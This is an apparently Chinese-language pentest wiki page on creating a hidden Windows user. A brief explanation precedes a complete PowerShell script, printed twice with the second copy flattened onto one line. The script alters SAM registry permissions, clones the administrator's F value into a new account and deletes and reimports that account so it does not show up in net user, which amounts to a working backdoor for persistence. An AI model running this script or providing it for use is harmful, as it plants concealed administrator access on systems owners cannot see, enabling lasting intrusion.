隐藏用户

原理： 1.用户名要以$结尾，输入net user无法获取 2.删除自身账户，再导入克隆的账户注册表，使注册表存在但是查不到账户

Powershell:

function Create-Clone
{
<#
.SYNOPSIS
This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user password
.PARAMETER cu
The user to clone, default administrator 
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
    Param(
        [Parameter(Mandatory=$true)]
        [String]
        $u,
        [Parameter(Mandatory=$true)]
        [String]
        $p,
        [Parameter(Mandatory=$false)]
        [String]
        $cu = "administrator"
    )
    function upReg{
        "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append  $env:temp\up.ini
        cmd /c "regini $env:temp\up.ini"
        Remove-Item $env:temp\up.ini
    }
    function downreg {
        "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append  $env:temp\down.ini
        cmd /c "regini $env:temp\down.ini"
        Remove-Item $env:temp\down.ini
    }
    function Create-user ([string]$Username,[string]$Password) {
        $group = "Administrators"
        $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
        if (!$existing) {
            Write-Host "[*] Creating new local user $Username with password $Password"
            & NET USER $Username $Password /add /y /expires:never | Out-Null
            Write-Host "[*] Adding local user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
        }
        else {
            Write-Host "[*] Adding existing user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
            $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
            $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
            Write-Host "[*] Setting password for existing local user $Username"
            $exist.SetPassword($Password) 
        }
        Write-Host "[*] Ensuring password for $Username never expires."
        & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null  
    }
    function GetUser-Key([string]$user)
    {
        cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
        cmd /c "regini $env:temp\$user.ini"
        Remove-Item $env:temp\$user.ini
        if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
            cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
            $file = Get-Content "$env:temp\$user.reg"  | Out-String
            $pattern="@=hex\((.*?)\)\:"
            $file -match $pattern |Out-Null
            $key = "00000"+$matches[1]
            Write-Host "[!]"$key
            return $key
        }else {
            Write-Host "[-] SomeThing Wrong !"
        }
    }
    function Clone ([string]$ukey,[string]$cukey) {
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini
        cmd /c " regini $env:temp\f.ini"
        Remove-Item $env:temp\f.ini
        $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
        $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
        Write-Host "[*] Get clone user'F value"
        $cuFreg = Get-Item -Path $cureg.Trim()
        $cuFvalue = $cuFreg.GetValue('F')
        Write-Host "[*] Change user'F value"
        Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
        $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
        cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
    }
    function Main () {
        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
        {
            Write-Output "Script must be run as administrator" 
            break
        }
        Write-Output "[*] Start"
        Write-Output "[*] Tring to change reg privilege !"
        upReg
        if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
            Write-Host "[-] The User to Clone does not exist !"
            Write-Output "[*] Change reg privilege back !"
            downReg
            Write-Output "[*] Exiting !"
        }
        else {
            if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                $tmp = "1"
            }
            else{
                $tmp = "0"
            }
            Write-Output "[*] Create User..."
            Create-user $u $p
            Write-Output "[*] Get User $u's  Key .."
            $ukey = GetUser-Key $u |Out-String
            Write-Output "[*] Get User $cu's  Key .."
            $cukey = GetUser-Key $cu |Out-String
            Write-Output "[*] Clone User.."
            Clone $ukey $cukey
            if($tmp -eq 1 ){
                Write-Output "[*] Delete User.."
                cmd /c "net User $u /del " |Out-Null
            }else{ Write-Output "[*] Don't need to delete.."}
            cmd /c "regedit /s $env:temp\$u.reg"
            cmd /c "regedit /s $env:temp\out.reg"
            Remove-Item $env:temp\*.reg
            Write-Output "[*] Change reg privilege back !"
            downreg
            Write-Output "[*] Done"
        }
    }
    Main
}

参考文章：

最后更新于3年前

这有帮助吗？

function Create-Clone { <# .SYNOPSIS This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user. .PARAMETER u The clone username .PARAMETER p The clone user password .PARAMETER cu The user to clone, default administrator .EXAMPLE Create-Clone -u evi1cg -p evi1cg123 -cu administrator #> Param( [Parameter(Mandatory=$true)] [String] $u, [Parameter(Mandatory=$true)] [String] $p, [Parameter(Mandatory=$false)] [String] $cu = "administrator" ) function upReg{ "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append $env:temp\up.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append $env:temp\up.ini cmd /c "regini $env:temp\up.ini" Remove-Item $env:temp\up.ini } function downreg { "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append $env:temp\down.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append $env:temp\down.ini cmd /c "regini $env:temp\down.ini" Remove-Item $env:temp\down.ini } function Create-user ([string]$Username,[string]$Password) { $group = "Administrators" $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username" if (!$existing) { Write-Host "[*] Creating new local user $Username with password $Password" & NET USER $Username $Password /add /y /expires:never | Out-Null Write-Host "[*] Adding local user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null } else { Write-Host "[*] Adding existing user $Username to $group." & NET LOCALGROUP $group $Username /add | Out-Null $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username } Write-Host "[*] Setting password for existing local user $Username" $exist.SetPassword($Password) } Write-Host "[*] Ensuring password for $Username never expires." & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null } function GetUser-Key([string]$user) { cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini" cmd /c "regini $env:temp\$user.ini" Remove-Item $env:temp\$user.ini if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){ cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"" $file = Get-Content "$env:temp\$user.reg" | Out-String $pattern="@=hex$(.*?)$\:" $file -match $pattern |Out-Null $key = "00000"+$matches[1] Write-Host "[!]"$key return $key }else { Write-Host "[-] SomeThing Wrong !" } } function Clone ([string]$ukey,[string]$cukey) { "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini cmd /c " regini $env:temp\f.ini" Remove-Item $env:temp\f.ini $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String Write-Host "[*] Get clone user'F value" $cuFreg = Get-Item -Path $cureg.Trim() $cuFvalue = $cuFreg.GetValue('F') Write-Host "[*] Change user'F value" Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey" cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()" } function Main () { if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Output "Script must be run as administrator" break } Write-Output "[*] Start" Write-Output "[*] Tring to change reg privilege !" upReg if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){ Write-Host "[-] The User to Clone does not exist !" Write-Output "[*] Change reg privilege back !" downReg Write-Output "[*] Exiting !" } else { if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){ $tmp = "1" } else{ $tmp = "0" } Write-Output "[*] Create User..." Create-user $u $p Write-Output "[*] Get User $u's Key .." $ukey = GetUser-Key $u |Out-String Write-Output "[*] Get User $cu's Key .." $cukey = GetUser-Key $cu |Out-String Write-Output "[*] Clone User.." Clone $ukey $cukey if($tmp -eq 1 ){ Write-Output "[*] Delete User.." cmd /c "net User $u /del " |Out-Null }else{ Write-Output "[*] Don't need to delete.."} cmd /c "regedit /s $env:temp\$u.reg" cmd /c "regedit /s $env:temp\out.reg" Remove-Item $env:temp\*.reg Write-Output "[*] Change reg privilege back !" downreg Write-Output "[*] Done" } } Main }